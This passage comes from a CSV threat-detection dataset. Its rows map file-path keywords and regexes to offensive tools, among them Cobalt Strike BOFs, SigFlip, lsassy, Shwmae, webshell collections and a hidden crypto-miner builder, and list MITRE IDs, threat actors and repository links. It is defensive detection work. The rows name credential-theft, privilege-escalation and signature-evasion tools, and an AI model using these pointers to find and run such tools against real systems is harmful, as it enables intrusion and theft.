Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11237" "*/Shoggoth.exe*",".{0,1000}\/Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","11238" "*/Shoggoth.git*",".{0,1000}\/Shoggoth\.git.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","11239" "*/shspawnas/*",".{0,1000}\/shspawnas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda 
- AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","11240" "*/Shu1337.php*",".{0,1000}\/Shu1337\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11241" "*/ShuckNT.git*",".{0,1000}\/ShuckNT\.git.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication tokens based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","11242" "*/Shwmae.exe*",".{0,1000}\/Shwmae\.exe.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation.
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","11243" "*/Shwmae.git*",".{0,1000}\/Shwmae\.git.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","11244" "*/shwmae/keys*",".{0,1000}\/shwmae\/keys.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","11245" "*/si1ent-le/CVE-2022-0847*",".{0,1000}\/si1ent\-le\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z","11246" "*/SigFlip.*",".{0,1000}\/SigFlip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11247" "*/sigflip.x64.*",".{0,1000}\/sigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11248" "*/sigflip.x86.*",".{0,1000}\/sigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11249" "*/SigFlip/*",".{0,1000}\/SigFlip\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11250" "*/SigLoader.go*",".{0,1000}\/SigLoader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11251" "*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11252" "*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11253" "*/SigmaPotato.git*",".{0,1000}\/SigmaPotato\.git.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","11254" 
"*/SigmaPotato/releases/download/*",".{0,1000}\/SigmaPotato\/releases\/download\/.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","11255" "*/signer-exe.py*",".{0,1000}\/signer\-exe\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","11256" "*/SignToolEx.cpp*",".{0,1000}\/SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","11257" "*/SignToolEx.git*",".{0,1000}\/SignToolEx\.git.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","11258" "*/SignToolEx.sln*",".{0,1000}\/SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","11259" "*/sigthief.py*",".{0,1000}\/sigthief\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber 
made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","11260" "*/SilentClean.exe*",".{0,1000}\/SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","11261" 
"*/SilentClean/SilentClean/*.cs*",".{0,1000}\/SilentClean\/SilentClean\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","11262" "*/SilentCryptoMiner/*",".{0,1000}\/SilentCryptoMiner\/.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - 
TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","11263" "*/silentdump.c*",".{0,1000}\/silentdump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","11264" "*/silentdump.h*",".{0,1000}\/silentdump\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","11265" "*/SilentHound.git*",".{0,1000}\/SilentHound\.git.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","11266" "*/SilentMoonwalk.git*",".{0,1000}\/SilentMoonwalk\.git.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC 
Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","11267" "*/silentprocessexit.py*",".{0,1000}\/silentprocessexit\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","11268" "*/silenttrinity/*.py*",".{0,1000}\/silenttrinity\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver 